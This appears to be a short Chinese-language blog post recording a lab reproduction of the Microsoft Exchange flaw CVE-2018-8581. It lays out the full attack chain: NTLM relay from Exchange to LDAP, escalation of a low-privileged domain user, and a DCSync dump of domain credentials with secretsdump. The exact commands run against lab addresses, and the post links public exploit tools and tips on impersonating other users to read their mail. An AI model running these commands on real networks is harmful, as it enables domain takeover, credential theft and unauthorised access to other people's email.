Microsoft Exchange漏洞記錄(擼向域控)
摘要:
前一段時間exchange出現了CVE-2018-8581,搭了許久的環境,不過不得不敬佩這個漏洞整體超讚。
一開始主要還是利用盜取exchange的管理員許可權去呼叫一些介面,導致可以做到,比如收取別人郵件,替別人傳送郵件。
攻擊域控
今天出了一個 更加深入的利用分析
主...
前一段時間exchange出現了CVE-2018-8581,搭了許久的環境,不過不得不敬佩這個漏洞整體超讚。
一開始主要還是利用盜取exchange的管理員許可權去呼叫一些介面,導致可以做到,比如收取別人郵件,替別人傳送郵件。
攻擊域控
今天出了一個 更加深入的利用分析
主要是利用了ews推送的ssrf,進行ntlm relay,從http -> ldap的利用。主要還是exchange許可權太高了,可以改變使用者的acl許可權,再通過DCSync dump資料。
利用程式:
privexchange.py:
https://github.com/dirkjanm/PrivExchange
ntlmrelayx.py、secretsdump.py:
https://github.com/SecureAuthCorp/impacket
ubuntu: 192.168.186.133 dc: 192.168.186.100 mail: mail.lemon.com -> 192.168.186.101 域名: LEMON 使用者名稱: lemon 命令: python privexchange.py -ah 192.168.186.133 mail.lemon.com -u lemon -p password -d LEMON --debug ntlmrelayx.py -t ldap://192.168.186.100 --escalate-user lemon python secretsdump.py LEMON/[email protected] -just-dc
越權操作
也已經有同學根據ZDI放出的指令碼寫了一個一鍵工具,方便利用: https://github.com/WyAtu/CVE-2018-8581
通過ews的許可權,根據sid來模擬各種使用者進行介面呼叫操作。
原poc應該是在2012中測試,但是對於低版本,比如exchange 2010沒有許可權那個功能,所以沒法獲取到SID
1、反向委託
2007就存在此介面,較為通用
2、如果在域內,命令列下可以用wmi獲取: wmi useraccount where name='lemon'
另外目前的一些介面主要是進行接收郵件,可以參考 介面文件 改一下,進行更多的郵件操作。